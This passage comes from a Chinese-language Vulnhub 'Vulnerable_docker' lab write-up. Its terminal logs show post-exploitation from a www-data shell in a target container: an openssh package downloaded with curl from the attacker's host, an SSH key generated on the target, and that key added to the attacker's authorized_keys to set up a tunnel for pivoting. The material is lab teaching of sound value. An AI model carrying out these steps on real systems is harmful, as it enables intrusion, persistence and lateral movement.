因此需要在Kali 本地利用dpkg -x 选项解压openssh.deb,然后将打包成.tar.gz,上传至靶机
──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ dpkg -x openssh.deb openssh
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ ls
nmap_full_scan openssh openssh.deb shell.php shell.sh
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ cd openssh
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker/openssh]
└─$ ls
etc usr
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker/openssh]
└─$ cd ..
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ ls
nmap_full_scan openssh openssh.deb shell.php shell.sh
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ tar -czvf openssh_deb.tar.gz openssh
openssh/usr/share/doc/openssh-client/changelog.Debian.gz
openssh/usr/share/doc/openssh-client/faq.html
openssh/etc/
openssh/etc/ssh/
openssh/etc/ssh/ssh_config
openssh/etc/ssh/moduli
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ ls
nmap_full_scan openssh.deb shell.php
openssh openssh_deb.tar.gz shell.sh
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$
www-data@8f4bca8ef241:/tmp$ curl -O http://192.168.56.137:8000/openssh_deb.tar.gz
< curl -O http://192.168.56.137:8000/openssh_deb.ta.gz
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 100 1608k 100 1608k 0 0 136M 0 --:--:-- --:--:-- --:--:-- 142M
www-data@8f4bca8ef241:/tmp$ ls
ls
openssh.deb
openssh_deb.tar.gz
shell.sh
www-data@8f4bca8ef241:/tmp$ rm -rf openssh.deb
rm -rf openssh.deb
www-data@8f4bca8ef241:/tmp$ tar -zxvf openssh_deb.tar.gz
tar -zxvf openssh_deb.tar.gz
openssh/
openssh/usr/
openssh/usr/lib/
openssh/usr/lib/openssh/
openssh/usr/lib/openssh/ssh-keysign
openssh/usr/lib/openssh/ssh-pkcs11-helper
openssh/usr/bin/
openssh/usr/bin/sftp
openssh/usr/bin/ssh-keygen
openssh/usr/bin/ssh-agent
openssh/usr/bin/slogin
openssh/usr/bin/scp
openssh/usr/bin/ssh-keyscan
openssh/usr/bin/ssh-copy-id
openssh/usr/bin/ssh
openssh/usr/bin/ssh-add
openssh/usr/bin/ssh-argv0
openssh/usr/share/
openssh/usr/share/upstart/
openssh/usr/share/upstart/sessions/
openssh/usr/share/upstart/sessions/ssh-agent.conf
openssh/usr/share/lintian/
openssh/usr/share/lintian/overrides/
openssh/usr/share/lintian/overrides/openssh-client
openssh/usr/share/man/
openssh/usr/share/man/man1/
openssh/usr/share/man/man1/ssh-keyscan.1.gz
openssh/usr/share/man/man1/ssh-keygen.1.gz
openssh/usr/share/man/man1/scp.1.gz
openssh/usr/share/man/man1/ssh-copy-id.1.gz
openssh/usr/share/man/man1/ssh-agent.1.gz
openssh/usr/share/man/man1/sftp.1.gz
openssh/usr/share/man/man1/ssh.1.gz
openssh/usr/share/man/man1/ssh-add.1.gz
openssh/usr/share/man/man1/slogin.1.gz
openssh/usr/share/man/man1/ssh-argv0.1.gz
openssh/usr/share/man/man8/
openssh/usr/share/man/man8/ssh-keysign.8.gz
openssh/usr/share/man/man8/ssh-pkcs11-helper.8.gz
openssh/usr/share/man/man5/
openssh/usr/share/man/man5/ssh_config.5.gz
openssh/usr/share/man/man5/moduli.5.gz
openssh/usr/share/apport/
openssh/usr/share/apport/package-hooks/
openssh/usr/share/apport/package-hooks/openssh-client.py
openssh/usr/share/doc/
openssh/usr/share/doc/openssh-client/
openssh/usr/share/doc/openssh-client/ChangeLog.gssapi
openssh/usr/share/doc/openssh-client/copyright
openssh/usr/share/doc/openssh-client/NEWS.Debian.gz
openssh/usr/share/doc/openssh-client/README.tun.gz
openssh/usr/share/doc/openssh-client/README.dns
openssh/usr/share/doc/openssh-client/README.Debian.gz
openssh/usr/share/doc/openssh-client/OVERVIEW.gz
openssh/usr/share/doc/openssh-client/README
openssh/usr/share/doc/openssh-client/changelog.gz
openssh/usr/share/doc/openssh-client/changelog.Debian.gz
openssh/usr/share/doc/openssh-client/faq.html
openssh/etc/
openssh/etc/ssh/
openssh/etc/ssh/ssh_config
openssh/etc/ssh/moduli
www-data@8f4bca8ef241:/tmp$ ls
ls
openssh
openssh_deb.tar.gz
shell.sh
www-data@8f4bca8ef241:/tmp$ cd openssh
cd openssh
www-data@8f4bca8ef241:/tmp/openssh$ ls
ls
etc
usr
www-data@8f4bca8ef241:/tmp/openssh$ cd usr
cd usr
www-data@8f4bca8ef241:/tmp/openssh/usr$ ls
ls
bin
lib
share
www-data@8f4bca8ef241:/tmp/openssh/usr$ cd ..
cd ..
www-data@8f4bca8ef241:/tmp/openssh$
这样就成功的将openssh.deb上传到靶机(即container)
www-data@8f4bca8ef241:/tmp/openssh$ ls
ls
etc
usr
www-data@8f4bca8ef241:/tmp/openssh$ cd usr
cd usr
www-data@8f4bca8ef241:/tmp/openssh/usr$ cd bin
cd bin
www-data@8f4bca8ef241:/tmp/openssh/usr/bin$ ls
ls
scp
sftp
slogin
ssh
ssh-add
ssh-agent
ssh-argv0
ssh-copy-id
ssh-keygen
ssh-keyscan
www-data@8f4bca8ef241:/tmp/openssh/usr/bin$ chmod +x ssh*
chmod +x ssh*
www-data@8f4bca8ef241:/tmp/openssh/usr/bin$ ./ssh-keygen -P '' -f id_rsa -t rsa
<openssh/usr/bin$ ./ssh-keygen -P '' -f id_rsa -t ra
Generating public/private rsa key pair.
Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
90:19:15:25:7c:c5:f4:d5:bd:dc:2e:5a:23:62:a8:98 www-data@8f4bca8ef241
The key's randomart image is:
+---[RSA 2048]----+
| .o+o.+o +|
| +... .. .o|
| + . o o|
| . o.|
| S. . |
| . o . + .|
| o . . . + o |
| E . . |
| |
+-----------------+
www-data@8f4bca8ef241:/tmp/openssh/usr/bin$ ls
ls
id_rsa
id_rsa.pub
scp
sftp
slogin
ssh
ssh-add
ssh-agent
ssh-argv0
ssh-copy-id
ssh-keygen
ssh-keyscan
www-data@8f4bca8ef241:/tmp/openssh/usr/bin$
查看前面得到的公钥文件,并将内容复制到Kali Linux本地
www-data@8f4bca8ef241:/tmp/openssh/usr/bin$ cat id_rsa.pub
cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpi9WMsShsaGdY7Wk5WaCtzJft8jBxFGeKu031h0QN7obPECtMkfaWBUjtlMLNegwu8TjBvIShZpdlARI8C25MW6fNTGQQKP6kvrPVC1mcsDvBtkQMyZXAMAQpRxD6SgHiE6Rr+bIffRgcFbTN8UqjqX0sxDrJCJeN1i7MJVPa53rkF465Fk+oNeCcVFSekPPYW7XpisOgkeMQ7RG4KHjy633IfHMF3/wT+gToAk+I5Tcs9wlHqTHdU503N5w8ILCRdfxF7YOyGllWeJVYPpHZS9k+1peQ9GjCsaBeCfKZkv9SCrjTPy0AzrdZ1AJInCGXJdoj508LcjbOsdyG3VA3 www-data@8f4bca8ef241
www-data@8f4bca8ef241:/tmp/openssh/usr/bin$
将公钥追加到Kali Linux的authorized_key
──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ ls -alh ~/.ssh
total 24K
drwx------ 2 kali kali 4.0K Nov 3 09:09 .
drwxr-xr-x 24 kali kali 4.0K Nov 5 00:03 ..
-rw------- 1 kali kali 2.6K Oct 31 09:07 id_rsa
-rw-r--r-- 1 kali kali 563 Oct 31 09:07 id_rsa.pub
-rw------- 1 kali kali 1.8K Nov 3 07:59 known_hosts
-rw------- 1 kali kali 1.6K Nov 3 07:58 known_hosts.old
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ cat id_rsa.pub > ~/.ssh/authorized_keys
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ cat ~/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpi9WMsShsaGdY7Wk5WaCtzJft8jBxFGeKu031h0QN7obPECtMkfaWBUjtlMLNegwu8TjBvIShZpdlARI8C25MW6fNTGQQKP6kvrPVC1mcsDvBtkQMyZXAMAQpRxD6SgHiE6Rr+bIffRgcFbTN8UqjqX0sxDrJCJeN1i7MJVPa53rkF465Fk+oNeCcVFSekPPYW7XpisOgkeMQ7RG4KHjy633IfHMF3/wT+gToAk+I5Tcs9wlHqTHdU503N5w8ILCRdfxF7YOyGllWeJVYPpHZS9k+1peQ9GjCsaBeCfKZkv9SCrjTPy0AzrdZ1AJInCGXJdoj508LcjbOsdyG3VA3 www-data@8f4bca8ef241
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$ ls -alh ~/.ssh/authorized_keys
-rw-r--r-- 1 kali kali 403 Nov 5 00:08 /home/kali/.ssh/authorized_keys
┌──(kali㉿kali)-[~/Vulnhub/Vulnerable_docker]
└─$